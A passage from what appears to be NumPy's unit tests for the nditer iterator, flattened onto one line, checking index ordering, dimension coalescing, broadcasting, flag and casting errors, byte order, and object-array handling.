2, 1), (1, 1, 0), (1, 1, 1), (1, 0, 0), (1, 0, 1)]) i = nditer(a.reshape(2, 3, 2)[:,:, ::-1], ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(0, 0, 1), (0, 0, 0), (0, 1, 1), (0, 1, 0), (0, 2, 1), (0, 2, 0), (1, 0, 1), (1, 0, 0), (1, 1, 1), (1, 1, 0), (1, 2, 1), (1, 2, 0)]) # 3D reversed Fortran-order i = nditer(a.reshape(2, 3, 2).copy(order='F')[::-1], ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(1, 0, 0), (0, 0, 0), (1, 1, 0), (0, 1, 0), (1, 2, 0), (0, 2, 0), (1, 0, 1), (0, 0, 1), (1, 1, 1), (0, 1, 1), (1, 2, 1), (0, 2, 1)]) i = nditer(a.reshape(2, 3, 2).copy(order='F')[:, ::-1], ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(0, 2, 0), (1, 2, 0), (0, 1, 0), (1, 1, 0), (0, 0, 0), (1, 0, 0), (0, 2, 1), (1, 2, 1), (0, 1, 1), (1, 1, 1), (0, 0, 1), (1, 0, 1)]) i = nditer(a.reshape(2, 3, 2).copy(order='F')[:,:, ::-1], ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(0, 0, 1), (1, 0, 1), (0, 1, 1), (1, 1, 1), (0, 2, 1), (1, 2, 1), (0, 0, 0), (1, 0, 0), (0, 1, 0), (1, 1, 0), (0, 2, 0), (1, 2, 0)]) def test_iter_best_order_c_index_1d(): # The C index should be correct with any reordering a = arange(4) # 1D order i = nditer(a, ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [0, 1, 2, 3]) # 1D reversed order i = nditer(a[::-1], ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [3, 2, 1, 0]) def test_iter_best_order_c_index_2d(): # The C index should be correct with any reordering a = arange(6) # 2D C-order i = nditer(a.reshape(2, 3), ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [0, 1, 2, 3, 4, 5]) # 2D Fortran-order i = nditer(a.reshape(2, 3).copy(order='F'), ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [0, 3, 1, 4, 2, 5]) # 2D reversed C-order i = nditer(a.reshape(2, 3)[::-1], ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [3, 4, 5, 0, 1, 2]) i = nditer(a.reshape(2, 3)[:, ::-1], ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [2, 1, 0, 5, 4, 3]) i = nditer(a.reshape(2, 3)[::-1, ::-1], ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [5, 4, 3, 2, 1, 0]) # 2D reversed Fortran-order i = nditer(a.reshape(2, 3).copy(order='F')[::-1], ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [3, 0, 4, 1, 5, 2]) i = nditer(a.reshape(2, 3).copy(order='F')[:, ::-1], ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [2, 5, 1, 4, 0, 3]) i = nditer(a.reshape(2, 3).copy(order='F')[::-1, ::-1], ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [5, 2, 4, 1, 3, 0]) def test_iter_best_order_c_index_3d(): # The C index should be correct with any reordering a = arange(12) # 3D C-order i = nditer(a.reshape(2, 3, 2), ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]) # 3D Fortran-order i = nditer(a.reshape(2, 3, 2).copy(order='F'), ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [0, 6, 2, 8, 4, 10, 1, 7, 3, 9, 5, 11]) # 3D reversed C-order i = nditer(a.reshape(2, 3, 2)[::-1], ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [6, 7, 8, 9, 10, 11, 0, 1, 2, 3, 4, 5]) i = nditer(a.reshape(2, 3, 2)[:, ::-1], ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [4, 5, 2, 3, 0, 1, 10, 11, 8, 9, 6, 7]) i = nditer(a.reshape(2, 3, 2)[:,:, ::-1], ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [1, 0, 3, 2, 5, 4, 7, 6, 9, 8, 11, 10]) # 3D reversed Fortran-order i = nditer(a.reshape(2, 3, 2).copy(order='F')[::-1], ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [6, 0, 8, 2, 10, 4, 7, 1, 9, 3, 11, 5]) i = nditer(a.reshape(2, 3, 2).copy(order='F')[:, ::-1], ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [4, 10, 2, 8, 0, 6, 5, 11, 3, 9, 1, 7]) i = nditer(a.reshape(2, 3, 2).copy(order='F')[:,:, ::-1], ['c_index'], [['readonly']]) assert_equal(iter_indices(i), [1, 7, 3, 9, 5, 11, 0, 6, 2, 8, 4, 10]) def test_iter_best_order_f_index_1d(): # The Fortran index should be correct with any reordering a = arange(4) # 1D order i = nditer(a, ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [0, 1, 2, 3]) # 1D reversed order i = nditer(a[::-1], ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [3, 2, 1, 0]) def test_iter_best_order_f_index_2d(): # The Fortran index should be correct with any reordering a = arange(6) # 2D C-order i = nditer(a.reshape(2, 3), ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [0, 2, 4, 1, 3, 5]) # 2D Fortran-order i = nditer(a.reshape(2, 3).copy(order='F'), ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [0, 1, 2, 3, 4, 5]) # 2D reversed C-order i = nditer(a.reshape(2, 3)[::-1], ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [1, 3, 5, 0, 2, 4]) i = nditer(a.reshape(2, 3)[:, ::-1], ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [4, 2, 0, 5, 3, 1]) i = nditer(a.reshape(2, 3)[::-1, ::-1], ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [5, 3, 1, 4, 2, 0]) # 2D reversed Fortran-order i = nditer(a.reshape(2, 3).copy(order='F')[::-1], ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [1, 0, 3, 2, 5, 4]) i = nditer(a.reshape(2, 3).copy(order='F')[:, ::-1], ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [4, 5, 2, 3, 0, 1]) i = nditer(a.reshape(2, 3).copy(order='F')[::-1, ::-1], ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [5, 4, 3, 2, 1, 0]) def test_iter_best_order_f_index_3d(): # The Fortran index should be correct with any reordering a = arange(12) # 3D C-order i = nditer(a.reshape(2, 3, 2), ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [0, 6, 2, 8, 4, 10, 1, 7, 3, 9, 5, 11]) # 3D Fortran-order i = nditer(a.reshape(2, 3, 2).copy(order='F'), ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]) # 3D reversed C-order i = nditer(a.reshape(2, 3, 2)[::-1], ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [1, 7, 3, 9, 5, 11, 0, 6, 2, 8, 4, 10]) i = nditer(a.reshape(2, 3, 2)[:, ::-1], ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [4, 10, 2, 8, 0, 6, 5, 11, 3, 9, 1, 7]) i = nditer(a.reshape(2, 3, 2)[:,:, ::-1], ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [6, 0, 8, 2, 10, 4, 7, 1, 9, 3, 11, 5]) # 3D reversed Fortran-order i = nditer(a.reshape(2, 3, 2).copy(order='F')[::-1], ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [1, 0, 3, 2, 5, 4, 7, 6, 9, 8, 11, 10]) i = nditer(a.reshape(2, 3, 2).copy(order='F')[:, ::-1], ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [4, 5, 2, 3, 0, 1, 10, 11, 8, 9, 6, 7]) i = nditer(a.reshape(2, 3, 2).copy(order='F')[:,:, ::-1], ['f_index'], [['readonly']]) assert_equal(iter_indices(i), [6, 7, 8, 9, 10, 11, 0, 1, 2, 3, 4, 5]) def test_iter_no_inner_full_coalesce(): # Check no_inner iterators which coalesce into a single inner loop for shape in [(5,), (3, 4), (2, 3, 4), (2, 3, 4, 3), (2, 3, 2, 2, 3)]: size = np.prod(shape) a = arange(size) # Test each combination of forward and backwards indexing for dirs in range(2**len(shape)): dirs_index = [slice(None)]*len(shape) for bit in range(len(shape)): if ((2**bit) & dirs): dirs_index[bit] = slice(None, None, -1) dirs_index = tuple(dirs_index) aview = a.reshape(shape)[dirs_index] # C-order i = nditer(aview, ['external_loop'], [['readonly']]) assert_equal(i.ndim, 1) assert_equal(i[0].shape, (size,)) # Fortran-order i = nditer(aview.T, ['external_loop'], [['readonly']]) assert_equal(i.ndim, 1) assert_equal(i[0].shape, (size,)) # Other order if len(shape) > 2: i = nditer(aview.swapaxes(0, 1), ['external_loop'], [['readonly']]) assert_equal(i.ndim, 1) assert_equal(i[0].shape, (size,)) def test_iter_no_inner_dim_coalescing(): # Check no_inner iterators whose dimensions may not coalesce completely # Skipping the last element in a dimension prevents coalescing # with the next-bigger dimension a = arange(24).reshape(2, 3, 4)[:,:, :-1] i = nditer(a, ['external_loop'], [['readonly']]) assert_equal(i.ndim, 2) assert_equal(i[0].shape, (3,)) a = arange(24).reshape(2, 3, 4)[:, :-1,:] i = nditer(a, ['external_loop'], [['readonly']]) assert_equal(i.ndim, 2) assert_equal(i[0].shape, (8,)) a = arange(24).reshape(2, 3, 4)[:-1,:,:] i = nditer(a, ['external_loop'], [['readonly']]) assert_equal(i.ndim, 1) assert_equal(i[0].shape, (12,)) # Even with lots of 1-sized dimensions, should still coalesce a = arange(24).reshape(1, 1, 2, 1, 1, 3, 1, 1, 4, 1, 1) i = nditer(a, ['external_loop'], [['readonly']]) assert_equal(i.ndim, 1) assert_equal(i[0].shape, (24,)) def test_iter_dim_coalescing(): # Check that the correct number of dimensions are coalesced # Tracking a multi-index disables coalescing a = arange(24).reshape(2, 3, 4) i = nditer(a, ['multi_index'], [['readonly']]) assert_equal(i.ndim, 3) # A tracked index can allow coalescing if it's compatible with the array a3d = arange(24).reshape(2, 3, 4) i = nditer(a3d, ['c_index'], [['readonly']]) assert_equal(i.ndim, 1) i = nditer(a3d.swapaxes(0, 1), ['c_index'], [['readonly']]) assert_equal(i.ndim, 3) i = nditer(a3d.T, ['c_index'], [['readonly']]) assert_equal(i.ndim, 3) i = nditer(a3d.T, ['f_index'], [['readonly']]) assert_equal(i.ndim, 1) i = nditer(a3d.T.swapaxes(0, 1), ['f_index'], [['readonly']]) assert_equal(i.ndim, 3) # When C or F order is forced, coalescing may still occur a3d = arange(24).reshape(2, 3, 4) i = nditer(a3d, order='C') assert_equal(i.ndim, 1) i = nditer(a3d.T, order='C') assert_equal(i.ndim, 3) i = nditer(a3d, order='F') assert_equal(i.ndim, 3) i = nditer(a3d.T, order='F') assert_equal(i.ndim, 1) i = nditer(a3d, order='A') assert_equal(i.ndim, 1) i = nditer(a3d.T, order='A') assert_equal(i.ndim, 1) def test_iter_broadcasting(): # Standard NumPy broadcasting rules # 1D with scalar i = nditer([arange(6), np.int32(2)], ['multi_index'], [['readonly']]*2) assert_equal(i.itersize, 6) assert_equal(i.shape, (6,)) # 2D with scalar i = nditer([arange(6).reshape(2, 3), np.int32(2)], ['multi_index'], [['readonly']]*2) assert_equal(i.itersize, 6) assert_equal(i.shape, (2, 3)) # 2D with 1D i = nditer([arange(6).reshape(2, 3), arange(3)], ['multi_index'], [['readonly']]*2) assert_equal(i.itersize, 6) assert_equal(i.shape, (2, 3)) i = nditer([arange(2).reshape(2, 1), arange(3)], ['multi_index'], [['readonly']]*2) assert_equal(i.itersize, 6) assert_equal(i.shape, (2, 3)) # 2D with 2D i = nditer([arange(2).reshape(2, 1), arange(3).reshape(1, 3)], ['multi_index'], [['readonly']]*2) assert_equal(i.itersize, 6) assert_equal(i.shape, (2, 3)) # 3D with scalar i = nditer([np.int32(2), arange(24).reshape(4, 2, 3)], ['multi_index'], [['readonly']]*2) assert_equal(i.itersize, 24) assert_equal(i.shape, (4, 2, 3)) # 3D with 1D i = nditer([arange(3), arange(24).reshape(4, 2, 3)], ['multi_index'], [['readonly']]*2) assert_equal(i.itersize, 24) assert_equal(i.shape, (4, 2, 3)) i = nditer([arange(3), arange(8).reshape(4, 2, 1)], ['multi_index'], [['readonly']]*2) assert_equal(i.itersize, 24) assert_equal(i.shape, (4, 2, 3)) # 3D with 2D i = nditer([arange(6).reshape(2, 3), arange(24).reshape(4, 2, 3)], ['multi_index'], [['readonly']]*2) assert_equal(i.itersize, 24) assert_equal(i.shape, (4, 2, 3)) i = nditer([arange(2).reshape(2, 1), arange(24).reshape(4, 2, 3)], ['multi_index'], [['readonly']]*2) assert_equal(i.itersize, 24) assert_equal(i.shape, (4, 2, 3)) i = nditer([arange(3).reshape(1, 3), arange(8).reshape(4, 2, 1)], ['multi_index'], [['readonly']]*2) assert_equal(i.itersize, 24) assert_equal(i.shape, (4, 2, 3)) # 3D with 3D i = nditer([arange(2).reshape(1, 2, 1), arange(3).reshape(1, 1, 3), arange(4).reshape(4, 1, 1)], ['multi_index'], [['readonly']]*3) assert_equal(i.itersize, 24) assert_equal(i.shape, (4, 2, 3)) i = nditer([arange(6).reshape(1, 2, 3), arange(4).reshape(4, 1, 1)], ['multi_index'], [['readonly']]*2) assert_equal(i.itersize, 24) assert_equal(i.shape, (4, 2, 3)) i = nditer([arange(24).reshape(4, 2, 3), arange(12).reshape(4, 1, 3)], ['multi_index'], [['readonly']]*2) assert_equal(i.itersize, 24) assert_equal(i.shape, (4, 2, 3)) def test_iter_itershape(): # Check that allocated outputs work with a specified shape a = np.arange(6, dtype='i2').reshape(2, 3) i = nditer([a, None], [], [['readonly'], ['writeonly', 'allocate']], op_axes=[[0, 1, None], None], itershape=(-1, -1, 4)) assert_equal(i.operands[1].shape, (2, 3, 4)) assert_equal(i.operands[1].strides, (24, 8, 2)) i = nditer([a.T, None], [], [['readonly'], ['writeonly', 'allocate']], op_axes=[[0, 1, None], None], itershape=(-1, -1, 4)) assert_equal(i.operands[1].shape, (3, 2, 4)) assert_equal(i.operands[1].strides, (8, 24, 2)) i = nditer([a.T, None], [], [['readonly'], ['writeonly', 'allocate']], order='F', op_axes=[[0, 1, None], None], itershape=(-1, -1, 4)) assert_equal(i.operands[1].shape, (3, 2, 4)) assert_equal(i.operands[1].strides, (2, 6, 12)) # If we specify 1 in the itershape, it shouldn't allow broadcasting # of that dimension to a bigger value assert_raises(ValueError, nditer, [a, None], [], [['readonly'], ['writeonly', 'allocate']], op_axes=[[0, 1, None], None], itershape=(-1, 1, 4)) # Test bug that for no op_axes but itershape, they are NULLed correctly i = np.nditer([np.ones(2), None, None], itershape=(2,)) def test_iter_broadcasting_errors(): # Check that errors are thrown for bad broadcasting shapes # 1D with 1D assert_raises(ValueError, nditer, [arange(2), arange(3)], [], [['readonly']]*2) # 2D with 1D assert_raises(ValueError, nditer, [arange(6).reshape(2, 3), arange(2)], [], [['readonly']]*2) # 2D with 2D assert_raises(ValueError, nditer, [arange(6).reshape(2, 3), arange(9).reshape(3, 3)], [], [['readonly']]*2) assert_raises(ValueError, nditer, [arange(6).reshape(2, 3), arange(4).reshape(2, 2)], [], [['readonly']]*2) # 3D with 3D assert_raises(ValueError, nditer, [arange(36).reshape(3, 3, 4), arange(24).reshape(2, 3, 4)], [], [['readonly']]*2) assert_raises(ValueError, nditer, [arange(8).reshape(2, 4, 1), arange(24).reshape(2, 3, 4)], [], [['readonly']]*2) # Verify that the error message mentions the right shapes try: nditer([arange(2).reshape(1, 2, 1), arange(3).reshape(1, 3), arange(6).reshape(2, 3)], [], [['readonly'], ['readonly'], ['writeonly', 'no_broadcast']]) raise AssertionError('Should have raised a broadcast error') except ValueError as e: msg = str(e) # The message should contain the shape of the 3rd operand assert_(msg.find('(2,3)') >= 0, 'Message "%s" doesn\'t contain operand shape (2,3)' % msg) # The message should contain the broadcast shape assert_(msg.find('(1,2,3)') >= 0, 'Message "%s" doesn\'t contain broadcast shape (1,2,3)' % msg) try: nditer([arange(6).reshape(2, 3), arange(2)], [], [['readonly'], ['readonly']], op_axes=[[0, 1], [0, np.newaxis]], itershape=(4, 3)) raise AssertionError('Should have raised a broadcast error') except ValueError as e: msg = str(e) # The message should contain "shape->remappedshape" for each operand assert_(msg.find('(2,3)->(2,3)') >= 0, 'Message "%s" doesn\'t contain operand shape (2,3)->(2,3)' % msg) assert_(msg.find('(2,)->(2,newaxis)') >= 0, ('Message "%s" doesn\'t contain remapped operand shape' + '(2,)->(2,newaxis)') % msg) # The message should contain the itershape parameter assert_(msg.find('(4,3)') >= 0, 'Message "%s" doesn\'t contain itershape parameter (4,3)' % msg) try: nditer([np.zeros((2, 1, 1)), np.zeros((2,))], [], [['writeonly', 'no_broadcast'], ['readonly']]) raise AssertionError('Should have raised a broadcast error') except ValueError as e: msg = str(e) # The message should contain the shape of the bad operand assert_(msg.find('(2,1,1)') >= 0, 'Message "%s" doesn\'t contain operand shape (2,1,1)' % msg) # The message should contain the broadcast shape assert_(msg.find('(2,1,2)') >= 0, 'Message "%s" doesn\'t contain the broadcast shape (2,1,2)' % msg) def test_iter_flags_errors(): # Check that bad combinations of flags produce errors a = arange(6) # Not enough operands assert_raises(ValueError, nditer, [], [], []) # Too many operands assert_raises(ValueError, nditer, [a]*100, [], [['readonly']]*100) # Bad global flag assert_raises(ValueError, nditer, [a], ['bad flag'], [['readonly']]) # Bad op flag assert_raises(ValueError, nditer, [a], [], [['readonly', 'bad flag']]) # Bad order parameter assert_raises(ValueError, nditer, [a], [], [['readonly']], order='G') # Bad casting parameter assert_raises(ValueError, nditer, [a], [], [['readonly']], casting='noon') # op_flags must match ops assert_raises(ValueError, nditer, [a]*3, [], [['readonly']]*2) # Cannot track both a C and an F index assert_raises(ValueError, nditer, a, ['c_index', 'f_index'], [['readonly']]) # Inner iteration and multi-indices/indices are incompatible assert_raises(ValueError, nditer, a, ['external_loop', 'multi_index'], [['readonly']]) assert_raises(ValueError, nditer, a, ['external_loop', 'c_index'], [['readonly']]) assert_raises(ValueError, nditer, a, ['external_loop', 'f_index'], [['readonly']]) # Must specify exactly one of readwrite/readonly/writeonly per operand assert_raises(ValueError, nditer, a, [], [[]]) assert_raises(ValueError, nditer, a, [], [['readonly', 'writeonly']]) assert_raises(ValueError, nditer, a, [], [['readonly', 'readwrite']]) assert_raises(ValueError, nditer, a, [], [['writeonly', 'readwrite']]) assert_raises(ValueError, nditer, a, [], [['readonly', 'writeonly', 'readwrite']]) # Python scalars are always readonly assert_raises(TypeError, nditer, 1.5, [], [['writeonly']]) assert_raises(TypeError, nditer, 1.5, [], [['readwrite']]) # Array scalars are always readonly assert_raises(TypeError, nditer, np.int32(1), [], [['writeonly']]) assert_raises(TypeError, nditer, np.int32(1), [], [['readwrite']]) # Check readonly array a.flags.writeable = False assert_raises(ValueError, nditer, a, [], [['writeonly']]) assert_raises(ValueError, nditer, a, [], [['readwrite']]) a.flags.writeable = True # Multi-indices available only with the multi_index flag i = nditer(arange(6), [], [['readonly']]) assert_raises(ValueError, lambda i:i.multi_index, i) # Index available only with an index flag assert_raises(ValueError, lambda i:i.index, i) # GotoCoords and GotoIndex incompatible with buffering or no_inner def assign_multi_index(i): i.multi_index = (0,) def assign_index(i): i.index = 0 def assign_iterindex(i): i.iterindex = 0 def assign_iterrange(i): i.iterrange = (0, 1) i = nditer(arange(6), ['external_loop']) assert_raises(ValueError, assign_multi_index, i) assert_raises(ValueError, assign_index, i) assert_raises(ValueError, assign_iterindex, i) assert_raises(ValueError, assign_iterrange, i) i = nditer(arange(6), ['buffered']) assert_raises(ValueError, assign_multi_index, i) assert_raises(ValueError, assign_index, i) assert_raises(ValueError, assign_iterrange, i) # Can't iterate if size is zero assert_raises(ValueError, nditer, np.array([])) def test_iter_slice(): a, b, c = np.arange(3), np.arange(3), np.arange(3.) i = nditer([a, b, c], [], ['readwrite']) i[0:2] = (3, 3) assert_equal(a, [3, 1, 2]) assert_equal(b, [3, 1, 2]) assert_equal(c, [0, 1, 2]) i[1] = 12 assert_equal(i[0:2], [3, 12]) def test_iter_nbo_align_contig(): # Check that byte order, alignment, and contig changes work # Byte order change by requesting a specific dtype a = np.arange(6, dtype='f4') au = a.byteswap().newbyteorder() assert_(a.dtype.byteorder != au.dtype.byteorder) i = nditer(au, [], [['readwrite', 'updateifcopy']], casting='equiv', op_dtypes=[np.dtype('f4')]) assert_equal(i.dtypes[0].byteorder, a.dtype.byteorder) assert_equal(i.operands[0].dtype.byteorder, a.dtype.byteorder) assert_equal(i.operands[0], a) i.operands[0][:] = 2 i = None assert_equal(au, [2]*6) # Byte order change by requesting NBO a = np.arange(6, dtype='f4') au = a.byteswap().newbyteorder() assert_(a.dtype.byteorder != au.dtype.byteorder) i = nditer(au, [], [['readwrite', 'updateifcopy', 'nbo']], casting='equiv') assert_equal(i.dtypes[0].byteorder, a.dtype.byteorder) assert_equal(i.operands[0].dtype.byteorder, a.dtype.byteorder) assert_equal(i.operands[0], a) i.operands[0][:] = 2 i = None assert_equal(au, [2]*6) # Unaligned input a = np.zeros((6*4+1,), dtype='i1')[1:] a.dtype = 'f4' a[:] = np.arange(6, dtype='f4') assert_(not a.flags.aligned) # Without 'aligned', shouldn't copy i = nditer(a, [], [['readonly']]) assert_(not i.operands[0].flags.aligned) assert_equal(i.operands[0], a) # With 'aligned', should make a copy i = nditer(a, [], [['readwrite', 'updateifcopy', 'aligned']]) assert_(i.operands[0].flags.aligned) assert_equal(i.operands[0], a) i.operands[0][:] = 3 i = None assert_equal(a, [3]*6) # Discontiguous input a = arange(12) # If it is contiguous, shouldn't copy i = nditer(a[:6], [], [['readonly']]) assert_(i.operands[0].flags.contiguous) assert_equal(i.operands[0], a[:6]) # If it isn't contiguous, should buffer i = nditer(a[::2], ['buffered', 'external_loop'], [['readonly', 'contig']], buffersize=10) assert_(i[0].flags.contiguous) assert_equal(i[0], a[::2]) def test_iter_array_cast(): # Check that arrays are cast as requested # No cast 'f4' -> 'f4' a = np.arange(6, dtype='f4').reshape(2, 3) i = nditer(a, [], [['readwrite']], op_dtypes=[np.dtype('f4')]) assert_equal(i.operands[0], a) assert_equal(i.operands[0].dtype, np.dtype('f4')) # Byte-order cast '<f4' -> '>f4' a = np.arange(6, dtype='<f4').reshape(2, 3) i = nditer(a, [], [['readwrite', 'updateifcopy']], casting='equiv', op_dtypes=[np.dtype('>f4')]) assert_equal(i.operands[0], a) assert_equal(i.operands[0].dtype, np.dtype('>f4')) # Safe case 'f4' -> 'f8' a = np.arange(24, dtype='f4').reshape(2, 3, 4).swapaxes(1, 2) i = nditer(a, [], [['readonly', 'copy']], casting='safe', op_dtypes=[np.dtype('f8')]) assert_equal(i.operands[0], a) assert_equal(i.operands[0].dtype, np.dtype('f8')) # The memory layout of the temporary should match a (a is (48,4,16)) # except negative strides get flipped to positive strides. assert_equal(i.operands[0].strides, (96, 8, 32)) a = a[::-1,:, ::-1] i = nditer(a, [], [['readonly', 'copy']], casting='safe', op_dtypes=[np.dtype('f8')]) assert_equal(i.operands[0], a) assert_equal(i.operands[0].dtype, np.dtype('f8')) assert_equal(i.operands[0].strides, (96, 8, 32)) # Same-kind cast 'f8' -> 'f4' -> 'f8' a = np.arange(24, dtype='f8').reshape(2, 3, 4).T i = nditer(a, [], [['readwrite', 'updateifcopy']], casting='same_kind', op_dtypes=[np.dtype('f4')]) assert_equal(i.operands[0], a) assert_equal(i.operands[0].dtype, np.dtype('f4')) assert_equal(i.operands[0].strides, (4, 16, 48)) # Check that UPDATEIFCOPY is activated i.operands[0][2, 1, 1] = -12.5 assert_(a[2, 1, 1] != -12.5) i = None assert_equal(a[2, 1, 1], -12.5) a = np.arange(6, dtype='i4')[::-2] i = nditer(a, [], [['writeonly', 'updateifcopy']], casting='unsafe', op_dtypes=[np.dtype('f4')]) assert_equal(i.operands[0].dtype, np.dtype('f4')) # Even though the stride was negative in 'a', it # becomes positive in the temporary assert_equal(i.operands[0].strides, (4,)) i.operands[0][:] = [1, 2, 3] i = None assert_equal(a, [1, 2, 3]) def test_iter_array_cast_errors(): # Check that invalid casts are caught # Need to enable copying for casts to occur assert_raises(TypeError, nditer, arange(2, dtype='f4'), [], [['readonly']], op_dtypes=[np.dtype('f8')]) # Also need to allow casting for casts to occur assert_raises(TypeError, nditer, arange(2, dtype='f4'), [], [['readonly', 'copy']], casting='no', op_dtypes=[np.dtype('f8')]) assert_raises(TypeError, nditer, arange(2, dtype='f4'), [], [['readonly', 'copy']], casting='equiv', op_dtypes=[np.dtype('f8')]) assert_raises(TypeError, nditer, arange(2, dtype='f8'), [], [['writeonly', 'updateifcopy']], casting='no', op_dtypes=[np.dtype('f4')]) assert_raises(TypeError, nditer, arange(2, dtype='f8'), [], [['writeonly', 'updateifcopy']], casting='equiv', op_dtypes=[np.dtype('f4')]) # '<f4' -> '>f4' should not work with casting='no' assert_raises(TypeError, nditer, arange(2, dtype='<f4'), [], [['readonly', 'copy']], casting='no', op_dtypes=[np.dtype('>f4')]) # 'f4' -> 'f8' is a safe cast, but 'f8' -> 'f4' isn't assert_raises(TypeError, nditer, arange(2, dtype='f4'), [], [['readwrite', 'updateifcopy']], casting='safe', op_dtypes=[np.dtype('f8')]) assert_raises(TypeError, nditer, arange(2, dtype='f8'), [], [['readwrite', 'updateifcopy']], casting='safe', op_dtypes=[np.dtype('f4')]) # 'f4' -> 'i4' is neither a safe nor a same-kind cast assert_raises(TypeError, nditer, arange(2, dtype='f4'), [], [['readonly', 'copy']], casting='same_kind', op_dtypes=[np.dtype('i4')]) assert_raises(TypeError, nditer, arange(2, dtype='i4'), [], [['writeonly', 'updateifcopy']], casting='same_kind', op_dtypes=[np.dtype('f4')]) def test_iter_scalar_cast(): # Check that scalars are cast as requested # No cast 'f4' -> 'f4' i = nditer(np.float32(2.5), [], [['readonly']], op_dtypes=[np.dtype('f4')]) assert_equal(i.dtypes[0], np.dtype('f4')) assert_equal(i.value.dtype, np.dtype('f4')) assert_equal(i.value, 2.5) # Safe cast 'f4' -> 'f8' i = nditer(np.float32(2.5), [], [['readonly', 'copy']], casting='safe', op_dtypes=[np.dtype('f8')]) assert_equal(i.dtypes[0], np.dtype('f8')) assert_equal(i.value.dtype, np.dtype('f8')) assert_equal(i.value, 2.5) # Same-kind cast 'f8' -> 'f4' i = nditer(np.float64(2.5), [], [['readonly', 'copy']], casting='same_kind', op_dtypes=[np.dtype('f4')]) assert_equal(i.dtypes[0], np.dtype('f4')) assert_equal(i.value.dtype, np.dtype('f4')) assert_equal(i.value, 2.5) # Unsafe cast 'f8' -> 'i4' i = nditer(np.float64(3.0), [], [['readonly', 'copy']], casting='unsafe', op_dtypes=[np.dtype('i4')]) assert_equal(i.dtypes[0], np.dtype('i4')) assert_equal(i.value.dtype, np.dtype('i4')) assert_equal(i.value, 3) # Readonly scalars may be cast even without setting COPY or BUFFERED i = nditer(3, [], [['readonly']], op_dtypes=[np.dtype('f8')]) assert_equal(i[0].dtype, np.dtype('f8')) assert_equal(i[0], 3.) def test_iter_scalar_cast_errors(): # Check that invalid casts are caught # Need to allow copying/buffering for write casts of scalars to occur assert_raises(TypeError, nditer, np.float32(2), [], [['readwrite']], op_dtypes=[np.dtype('f8')]) assert_raises(TypeError, nditer, 2.5, [], [['readwrite']], op_dtypes=[np.dtype('f4')]) # 'f8' -> 'f4' isn't a safe cast if the value would overflow assert_raises(TypeError, nditer, np.float64(1e60), [], [['readonly']], casting='safe', op_dtypes=[np.dtype('f4')]) # 'f4' -> 'i4' is neither a safe nor a same-kind cast assert_raises(TypeError, nditer, np.float32(2), [], [['readonly']], casting='same_kind', op_dtypes=[np.dtype('i4')]) def test_iter_object_arrays_basic(): # Check that object arrays work obj = {'a':3,'b':'d'} a = np.array([[1, 2, 3], None, obj, None], dtype='O') rc = sys.getrefcount(obj) # Need to allow references for object arrays assert_raises(TypeError, nditer, a) assert_equal(sys.getrefcount(obj), rc) i = nditer(a, ['refs_ok'], ['readonly']) vals = [x_[()] for x_ in i] assert_equal(np.array(vals, dtype='O'), a) vals, i, x = [None]*3 assert_equal(sys.getrefcount(obj), rc) i = nditer(a.reshape(2, 2).T, ['refs_ok', 'buffered'], ['readonly'], order='C') assert_(i.iterationneedsapi) vals = [x_[()] for x_ in i] assert_equal(np.array(vals, dtype='O'), a.reshape(2, 2).ravel(order='F')) vals, i, x = [None]*3 assert_equal(sys.getrefcount(obj), rc) i = nditer(a.reshape(2, 2).T, ['refs_ok', 'buffered'], ['readwrite'], order='C') for x in i: x[...] = None vals, i, x = [None]*3 assert_equal(sys.getrefcount(obj), rc-1) assert_equal(a, np.array([None]*4, dtype='O')) def test_iter_object_arrays_conversions(): # Conversions to/from objects a = np.arange(6, dtype='O') i = nditer(a, ['refs_ok', 'buffered'], ['readwrite'], casting='unsafe', op_dtypes='i4') for x in i: x[...] += 1 assert_equal(a, np.arange(6)+1) a = np.arange(6, dtype='i4') i = nditer(a, ['refs_ok', 'buffered'], ['readwrite'], casting='unsafe', op_dtypes='O') for x in i: x[...] += 1 assert_equal(a, np.arange(6)+1) # Non-contiguous object array a = np.zeros((6,), dtype=[('p', 'i1'), ('a', 'O')]) a = a['a'] a[:] = np.arange(6) i = nditer(a, ['refs_ok', 'buffered'], ['readwrite'], casting='unsafe', op_dtypes='i4') for x in i: x[...] += 1 assert_equal(a, np.arange(6)+1) #Non-contiguous value array a = np.zeros((6,), dtype=[('p', 'i1'), ('a', 'i4')]) a = a['a'] a[:] = np.arange(6) + 98172488 i = nditer(a, ['refs_ok', 